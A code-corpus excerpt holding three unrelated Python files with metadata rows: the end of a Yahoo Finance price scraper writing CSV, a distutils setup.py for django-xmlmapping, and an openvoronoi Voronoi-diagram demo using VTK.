HtmlEncoding = "UTF-8";
soup = BeautifulSoup(respHtml, fromEncoding=HtmlEncoding);
tag_top = soup.find('table', {"class":"yfnc_datamodoutline1"});
tag_body = tag_top.contents[0].contents[0].contents[0];
str_date = process_date(tag_body.contents[1].contents[0].contents[0]);
open_price = process_num(tag_body.contents[1].contents[1].contents[0]);
high_price = process_num(tag_body.contents[1].contents[2].contents[0]);
low_price = process_num(tag_body.contents[1].contents[3].contents[0]);
close_price = process_num(tag_body.contents[1].contents[4].contents[0]);
volume = process_num(tag_body.contents[1].contents[5].contents[0]);
if volume != "0":
daily_file = sys.argv[1];
history_file = sys.argv[2];
daily_fp = open(daily_file, 'w');
history_fp = open(history_file, 'a');
title_str = "Date,Open Price,High Price,Low Price,Close Price,Volume(GBP)\n";
daily_fp.write(title_str);
day_market_data = str_date+","+open_price+","+high_price+","+low_price+","+close_price+","+volume+'\n';
daily_fp.write(day_market_data);
history_fp.write(day_market_data);
daily_fp.close();
history_fp.close();
| cc0-1.0 | -2,231,879,005,828,900,900 | 29.123288 | 108 | 0.612551 | false | 2.704797 | false | false | false |
YAmikep/django-xmlmapping | setup.py | 1 | 3687 | """
Based entirely on Django's own ``setup.py`` for now.
"""
from distutils.core import setup
from distutils.command.install_data import install_data
from distutils.command.install import INSTALL_SCHEMES
import os
import sys
class osx_install_data(install_data):
# On MacOS, the platform-specific lib dir is /System/Library/Framework/Python/.../
# which is wrong. Python 2.5 supplied with MacOS 10.5 has an Apple-specific fix
# for this in distutils.command.install_data#306. It fixes install_lib but not
# install_data, which is why we roll our own install_data class.
def finalize_options(self):
# By the time finalize_options is called, install.install_lib is set to the
# fixed directory, so we set the installdir to install_lib. The
# install_data class uses ('install_data', 'install_dir') instead.
self.set_undefined_options('install', ('install_lib', 'install_dir'))
install_data.finalize_options(self)
if sys.platform == "darwin":
cmdclasses = {'install_data': osx_install_data}
else:
cmdclasses = {'install_data': install_data}
def fullsplit(path, result=None):
"""
Split a pathname into components (the opposite of os.path.join) in a
platform-neutral way.
"""
if result is None:
result = []
head, tail = os.path.split(path)
if head == '':
return [tail] + result
if head == path:
return result
return fullsplit(head, [tail] + result)
# Tell distutils not to put the data_files in platform-specific installation
# locations. See here for an explanation:
# http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir != '':
os.chdir(root_dir)
xmlmapping_dir = 'xmlmapping'
for dirpath, dirnames, filenames in os.walk(xmlmapping_dir):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'):
del dirnames[i]
if '__init__.py' in filenames:
packages.append('.'.join(fullsplit(dirpath)))
elif filenames:
data_files.append([dirpath, [os.path.join(dirpath, f) for f in filenames]])
# Small hack for working with bdist_wininst.
# See http://mail.python.org/pipermail/distutils-sig/2004-August/004134.html
if len(sys.argv) > 1 and sys.argv[1] == 'bdist_wininst':
for file_info in data_files:
file_info[0] = '\\PURELIB\\%s' % file_info[0]
# Dynamically calculate the version based on django.VERSION.
version = __import__('xmlmapping').get_version()
setup(
name = "django-xmlmapping",
version = version,
url = 'https://github.com/YAmikep/django-xmlmapping',
author = 'Michael Palumbo',
author_email = '[email protected]',
description = 'Library to map XML data to a Django data model and persist the data in the data base.',
packages = packages,
cmdclass = cmdclasses,
data_files = data_files,
classifiers = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities',
'Topic :: Internet'
],
)
| bsd-3-clause | 3,709,194,845,001,403,000 | 35.622449 | 106 | 0.652834 | false | 3.694389 | false | false | false |
aewallin/openvoronoi | python_examples/line-segment/lineseg_3.py | 1 | 4439 | import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
def drawLine(myscreen, p1, p2):
myscreen.addActor(ovdvtk.Line(p1=(p1.x, p1.y, 0), p2=(p2.x, p2.y, 0), color=ovdvtk.yellow))
def writeFrame(w2if, lwr, n):
w2if.Modified()
current_dir = os.getcwd()
filename = current_dir + "/frames/vd500_zoomout" + ('%05d' % n) + ".png"
lwr.SetFileName(filename)
# lwr.Write()
def regularGridGenerators(far, Nmax):
# REGULAR GRID
rows = int(math.sqrt(Nmax))
print "rows= ", rows
gpos = [-0.7 * far, 1.4 * far / float(rows - 1)] # start, stride
plist = []
for n in range(rows):
for m in range(rows):
x = gpos[0] + gpos[1] * n
y = gpos[0] + gpos[1] * m
# rotation
# alfa = 0
# xt=x
# yt=y
# x = xt*math.cos(alfa)-yt*math.sin(alfa)
# y = xt*math.sin(alfa)+yt*math.cos(alfa)
plist.append(ovd.Point(x, y))
random.shuffle(plist)
return plist
def randomGenerators(far, Nmax):
pradius = (1.0 / math.sqrt(2)) * far
plist = []
for n in range(Nmax):
x = -pradius + 2 * pradius * random.random()
y = -pradius + 2 * pradius * random.random()
plist.append(ovd.Point(x, y))
return plist
def circleGenerators(far, Nmax):
# POINTS ON A CIRCLE
# """
# cpos=[50,50]
# npts = 100
dalfa = float(2 * math.pi) / float(Nmax - 1)
# dgamma= 10*2*math.pi/npts
# alfa=0
# ofs=10
plist = []
radius = 0.81234 * float(far)
for n in range(Nmax):
x = float(radius) * math.cos(float(n) * float(dalfa))
y = float(radius) * math.sin(float(n) * float(dalfa))
plist.append(ovd.Point(x, y))
# random.shuffle(plist)
return plist
if __name__ == "__main__":
# print ocl.revision()
myscreen = ovdvtk.VTKScreen(width=1024, height=720) # (width=1920, height=1080)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInputConnection(w2if.GetOutputPort())
# w2if.Modified()
# lwr.SetFileName("tux1.png")
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 4
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
# vod.clearance_disk=1
vod.vertexRadius = 0.005
vod.textScale = 0.02
Nmax = 20
plist = randomGenerators(far, Nmax)
# plist = regularGridGenerators(far, Nmax)
# plist = circleGenerators(far, Nmax)
# plist = randomGenerators(far, Nmax)
# plist = []
# plist.append( ovd.Point(0.0,0.1) )
# plist.append( ovd.Point(0,0.9) )
# plist.append( ovd.Point(-0.15, -0.15) )
# + regularGridGenerators(far, Nmax) + circleGenerators(far, Nmax)
# plist = [ovd.Point(0,0)]
t_before = time.time()
n = 0
id_list = []
for p in plist:
print n, " adding ", p
id_list.append(vd.addVertexSite(p))
n = n + 1
Nsegs = 0
# print "returned: ",vd.addLineSite(69,105,10)
"""
vd.addLineSite(83,35)
vd.addLineSite(63,153)
vd.addLineSite(48,20)
vd.addLineSite(74,143)
vd.addLineSite(125,173)
vd.addLineSite(165,91)
"""
# segs=[]
# for n in range(Nsegs*2):
# ids.append( id_list[n] )
# segs.append( [17,13] )
# segs.append( [21,34] )
# segs.append( [26,44] )
# id1 = id_list[0]
# id2 = id_list[1]
# id3 = id_list[2]
# id4 = id_list[3]
# for seg in segs:
# id1= seg[0]
# id2= seg[1]
# print "add segment ",id1, " to ", id2
# vd.addLineSite( id1, id2 , 20)
# vd.addLineSite( id3, id4 )
t_after = time.time()
calctime = t_after - t_before
if Nmax == 0:
Nmax = 1
print " VD done in ", calctime, " s, ", calctime / Nmax, " s per generator"
vod.setAll()
myscreen.render()
print "PYTHON All DONE."
myscreen.render()
myscreen.iren.Start()
| lgpl-2.1 | 1,067,751,821,632,725,200 | 24.80814 | 95 | 0.573327 | false | 2.741816 | false | false | false |